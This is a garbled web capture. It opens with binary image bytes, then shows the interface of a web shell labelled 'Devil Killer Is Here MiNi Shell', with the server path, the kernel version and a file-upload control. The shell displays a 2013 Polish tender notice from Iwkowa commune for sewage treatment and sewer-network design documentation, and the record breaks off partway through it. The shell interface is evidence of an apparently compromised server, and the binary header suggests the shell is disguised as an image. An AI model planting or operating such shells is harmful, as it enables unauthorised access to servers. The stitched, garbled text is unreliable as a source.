JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131220/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131220/278271-N-2013.html

<p class="kh_header"><b>Iwkowa: Opracowanie dokumentacji projektowej dla budowy oczyszczalni ścieków      i sieci kanalizacyjnej na terenie gminy Iwkowa</b><br>
<b>Numer ogłoszenia: 278271 - 2013; data zamieszczenia: 20.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Iwkowa , Iwkowa 468, 32-861 Iwkowa, woj. małopolskie, tel. 014 68-44-010, 68-44-020, faks 014 6844060.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.iwkowa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowej dla budowy oczyszczalni ścieków      i sieci kanalizacyjnej na terenie gminy Iwkowa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem  zamówienia jest: opracowanie dokumentacji  projektowej dla  budowy oczyszczalni ścieków i sieci kanalizacyjnej wraz przyłączami na terenie gminy Iwkowa z podziałem na III etapy,  zakończone uzyskaniem prawomocnego pozwolenia na budowę.
2.	Zakres  zamówienia obejmuje:
2.1	 ETAP I  -   projekt oczyszczalni ścieków.
2.2	 ETAP II -   projekt sieci kanalizacyjnej wraz z przyłączami obejmujący teren części                                       miejscowości Kąty. 
       Zakres obszaru dla którego należy wykonać przedmiotową dokumentację,                   
       oznaczony jest symbolem K1 i określony został na:
       -  kopii mapy, stanowiącej załącznik nr 1 do SIWZ, 
       -  kopii mapy, stanowiącej załącznik nr 2 do SIWZ.
2.3	 ETAP III - projekt sieci kanalizacyjnej  wraz z przyłączami obejmujący teren części  miejscowości Połom Mały, Iwkowa, Kąty oraz Porąbka Iwkowska. 
Zakres obszaru dla którego należy wykonać przedmiotową dokumentację, oznaczony                     jest symbolem K2, K3, K4, K5 i określony został na:
-  kopii mapy,  stanowiącej załącznik nr 1  do SIWZ,
-  kopii mapy,  stanowiącej załącznik nr 3/1, 3/2,  3/3, 3/4  do SIWZ.
2.4	 Dokumentację projektową dla Etapu I, II i III   należy opracować  oddzielnie.   
W skład przedmiotowego opracowania wchodzą:
a)	Opracowanie projektu budowlanego i wykonawczego oczyszczalni ścieków, sieci kanalizacyjnej  i przyłączy domowych łącznie z wszelkimi obiektami towarzyszącymi, sieciami towarzyszącymi  i przyłączami wraz z uzgodnieniami ze wszystkimi jednostkami i organami opiniującymi dla tego typu przedsięwzięć. 
Obszar objęty opracowaniem określony został na kopii map,  stanowiących załączniki:  nr 1 do SIWZ,  nr  2 do SIWZ, nr  3/1, 3/2, 3/3, 3/4  do SIWZ.
b)	Zamawiający przewiduje następujące wielkości najważniejszych elementów  do zaprojektowania, z zaznaczeniem, że podane wielkości są orientacyjne:
- sieć kanalizacyjna wraz z przykanalikami: 31 300 mb,
- przyłącza: 13 000 mb,
- rurociągi tłoczne - 2 500 mb,
- przepompownie - 9 szt.,
- oczyszczalnia ścieków o przepustowości 450m3/dobę- 1 kpl.
c)	Szczegółowy zakres zadania określają  założenia  do prac projektowych,  stanowiące                     
            załącznik nr 4 do SWIZ.
d)	Dokumentacja projektowa obejmująca ETAP I, ETAP II i ETAP III powinna być opracowana  w taki sposób aby stanowiły po zrealizowaniu jedną całość funkcjonalno-użytkową oraz stanowiły jeden system kanalizacji i oczyszczania. Wykonawca dostarczy Zamawiającemu          1 egz. dokumentacji projektowej wraz  z kosztorysami przed złożeniem wniosku o wydanie pozwolenia na budowę w celu ostatecznego zaopiniowania. Termin dostarczenia powinien być tak dobrany aby pozostający czas na wykonanie przedmiotu zamówienia  pozwalał           Wykonawcy uwzględnić ewentualne uwagi Zamawiającego, tj. 20 dni. Termin ten może być zmieniony po uzgodnieniu z Zamawiającym.
e)	Opracowanie kosztorysowe obejmujące: kosztorys inwestorski , przedmiar robót -oddzielnie dla każdego Etapu z podziałem na branże oraz opracowanie zestawienia kosztorysowego dla całości zadania. Opracowanie kosztorysowe  winno spełniać wymagania określone w Rozporządzeniu  Ministra Infrastruktury z dnia 18 maja 2004r w sprawie określenia metod  i pod-staw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych  w programie funkcjonalno - użytkowym   (Dz. U.  z 2004r., Nr 130, poz. 1389).
f)	Opracowanie specyfikacji technicznej wykonania i odbioru robót - oddzielnie   dla każdego  Etapu ,  w zakresie i formie zgodnej z Rozporządzeniem Ministra Infrastruktury z dnia                  2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. z 2013 r., poz. 1129).   
g)	Dokumentację projektową należy opracować w zakresie i formie zgodnej z Rozporządzeniem Ministra Infrastruktury z dnia  2 września 2004 r. w sprawie szczegółowego zakresu              i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót          budowlanych oraz programu funkcjonalno-użytkowego  (Dz. U.  z 2013 r., poz. 1129),   Rozporządzeniem Ministra Transportu, Budownictwa i Gospodarki Morskiej  z dnia                   25 kwietnia 2012r. w sprawie szczegółowego zakresu i formy projektu budowlanego              (Dz. U. z 2012r., poz. 462 z późn. zm.)  oraz ustawą z dnia 7 lipca 1994r. Prawo budowlane (Dz. U.  z 2010 r. Nr 243, poz. 1623 z późn. zm.),  sztuką budowlaną, wszelkimi obowiązującymi przepisami , normami, zasadami współczesnej wiedzy technicznej.
h)	Uzyskanie pisemnej zgody właścicieli (współwłaścicieli) działek na zlokalizowanie sieci kanalizacyjnej i jej elementów w formie umów cywilno-prawnych (wg. wzoru opracowanego przez Wykonawcę i uzgodnionego z Zamawiającym) zawierających zgodę na wejście w te-ren. Przebieg sieci kanalizacyjnej lub lokalizację jej elementów należy przedstawić na kopii mapy zasadniczej w koniecznym zakresie i dołączyć  do zgody. 
W tym celu Zamawiający udzieli Wykonawcy odpowiedniego upoważnienia.
i)	Uzyskanie warunków technicznych zasilania energetycznego, przejścia pod drogami, 
rowami i innymi przeszkodami terenowymi.  
j)	Raport(y) oddziaływania na środowisko wymagany(e) prawem polskim - o ile jest   on nie-zbędny.
k)	Operat (y)   wodno-prawny(e)   w  niezbędnym  zakresie  do  uzyskaniem  pozwolenia wod-no-prawnego (pozwoleń wodno-prawnych) - o ile jest on niezbędny. 
l)	Uzyskanie stosownej decyzji w sprawie wyłączenia gruntu z produkcji rolniczej                           (Opłatę za wyłączenie uiści Zamawiający).
m)	Wykonawca zobowiązany jest do opracowania niezbędnej dokumentacji wymaganej do uzyskania wszelkich uzgodnień lub decyzji (np. decyzja o środowiskowych uwarunkowaniach) oraz przygotowania wniosku o wydanie warunków zabudowy dla inwestycji celu publiczne-go, złożenia wniosku z kompletną dokumentacją w Urzędzie Gminy w Iwkowej w imieniu Zamawiającego, zgodnie z udzielonym upoważnieniem  i uzyskanie prawomocnej decyzji o WZ dla budowy oczyszczalni ścieków i sieci kanalizacyjnej  - oddzielnie dla każdego z Etapów. 
n)	   Opracowanie informacji dotyczącej bezpieczeństwa i ochrony zdrowia - oddzielnie dla każdego  z Etapów. 
o)	Wykonawca zobowiązany jest do przygotowania kompletnej dokumentacji potrzebnej                do złożenia wniosku, w Starostwie Powiatowym w Brzesku, o wydanie pozwolenia na budo-wę i uzyskanie prawomocnego pozwolenia na budowę oczyszczalni ścieków i sieci kanalizacyjnej wraz z przyłączami oddzielnie dla każdego Etapu. W tym celu Zamawiający udzieli Wykonawcy odpowiedniego upoważnienia.
p)	Projekty budowlane i wykonawcze powinny zawierać wykaz opracowań oraz pisemne oświadczenie Wykonawcy, że zostały wykonane zgodnie z umową, obowiązującymi przepisami, normami, oraz że zostały złożone w stanie kompletnym z punktu widzenia celu, któremu mają służyć.
q)	Dokumentację projektową należy opracować w wersji drukowanej w 5 egzemplarzach.            Dodatkowo Wykonawca dostarczy Zamawiającemu w ilości 3 egzemplarzy całość 
dokumentacji projektowej (w tym rysunki, kosztorysy, specyfikacje, itd.) w wersji elektronicznej na nośnikach CD lub DVD, w formatach ogólnie dostępnych  np. pdf, jpg itd..
r)	Dla potrzeb realizacji zamówienia Zamawiający udzieli Wykonawcy stosownych 
upoważnień celem reprezentowania Zamawiającego. 
2.5	Szczegółowy zakres projektu, tj. przebieg trasy sieci kanalizacyjnej oraz lokalizację miejsc zasilania, sposób monitoringu i oprzyrządowania sieci, należy uzgodnić  z  Zamawiającym,   a przed ostatecznym wykonaniem projektu, przyjęte założenia  projektowe należy przedstawić Zamawiającemu do akceptacji.
2.6	Zamawiający zastrzega sobie prawo wglądu do dokumentacji lub zwrócenia się                    do Wykonawcy o okazanie dokumentacji w trakcie jej wykonywania..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.24.00.00-2, 71.32.22.00-3, 71.32.70.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 23.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Każdy wykonawca biorący udział w przetargu musi przed upływem terminu składania ofert  
   wnieść wadium w wysokości 8 000,00 zł.
2.	Wadium może być w wniesione w jednej lub kilku następujących formach, tj.: 
a)	pieniądzu,
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)	gwarancjach bankowych,
d)	gwarancjach ubezpieczeniowych,
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy             z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości            (Dz. U. z 2007r., Nr 42, poz. 275,  z późn. zm.)
3.	Wadium  wnoszone w  pieniądzu  należy wpłacić przelewem na rachunek bankowy Urzędu  Gminy w Iwkowej: BSR Kraków O/Iwkowa   67 8589 0006 0090 0000 2567 0002 przy czym Zamawiający musi otrzymać z banku potwierdzenie wpływu przelewu najpóźniej przed upływem terminu składania ofert.  Za skuteczność operacji finansowo - bankowych odpowiada  Wykonawca. Kopię przelewu należy dołączyć do oferty.
4.	Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym. 
5.	Wadium  wnoszone w formie gwarancji lub innego dokumentu, oryginał należy złożyć w kasie najpóźniej przed upływem terminu składania ofert, a kopię tego dokumentu wpiąć do oferty.   
6.	Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a ustawy Pzp.
7.	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano.
8.	Zamawiający zwraca niezwłocznie wadium, na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
9.	Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie art. 46 ust. 1 ustawy Pzp, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez zamawiającego.
10.	Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi 
z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
11.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, nie złożył dokumentów lub oświadczeń,                                   o których mowa w art. 25 ust. 1 ustawy Pzp lub pełnomocnictw, chyba że udowodni, że wynika  to z przyczyn nieleżących po jego stronie.
12.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
a)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
b)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
c)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie formułuje szczegółowych warunków w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek  ten zostanie spełniony, gdy Wykonawca:
a)	przedłoży oświadczenie, że spełnia warunki określone w art. 22 ust. 1 ustawy  Pzp -                  wg wzoru zał. nr 6 do SIWZ.
b)	 wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert,            a jeżeli okres  prowadzenia działalności  jest krótszy - w tym okresie, wykonał: 
-	jedną  dokumentację  projektową (lub kilka dokumentacji projektowych) dotyczącą  (dotyczących) oczyszczalni ścieków przy czym jedna dokumentacja projektowa musi dotyczyć zaprojektowania oczyszczalni ścieków o przepustowości min. 200 m3/dobę , wraz  z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługa (usługi) została (zostały) wykonane, 
-	jedną dokumentację projektową (lub kilka dokumentacji projektowych) dotyczącą  (dotyczących) sieci kanalizacyjnej wraz z przyłączami o łącznej długości  
min.  20 000 mb, wraz z podaniem ich wartości, przedmiotu, dat wykonania
i podmiotów, na rzecz których usługa (usługi) została (zostały) wykonane, 
c)	załączy dowody, czy wykazana (wykazane)  usługa (usługi)  zostały wykonane należycie.
Na potwierdzenie spełnienia tego warunku Wykonawca załączy oświadczenie - wg wzoru zał. nr 6 do SIWZ oraz wykaz usług - wg wzoru zał. nr 7 do SIWZ oraz załączy dowody, czy wykazane usługi zostały wykonane należycie, zgodnie z § 1 ust. 2 i 3, § 9 ust. 2 Rozporządzenia  Prezesa Rady Ministrów z dnia  19 lutego 2013 r. w sprawie rodzajów dokumentów,  jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane  (Dz. U. z  2013 roku,  poz. 231).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie formułuje szczegółowych warunków w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek  ten zostanie spełniony, gdy Wykonawca przedłoży oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia,  jeżeli ustawy nakładają obowiązek posiadania takich uprawnień - wg wzoru zał. nr 8 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie formułuje szczegółowych warunków w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.    Wypełniony i podpisany formularz oferty - wg wzoru zał. Nr 5 do SIWZ.
2.    Zaakceptowany przez Wykonawcę wzór umowy  -  zał. Nr 11 do  SIWZ.
                          3.    W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia         w myśl art. 23 ustawy Pzp:. 
- należy dostarczyć pełnomocnictwo do reprezentowania wszystkich Wykonawców. 
                                    Pełnomocnik może być ustanowiony do reprezentowania Wykonawców                        
                                    w postępowaniu albo do reprezentowania w postępowaniu  i zawarcia umowy                    
                                    w sprawie przedmiotowego zamówienia,
                                  -  dokumenty składane w zakresie potwierdzenia niepodlegania wykluczeniu na 
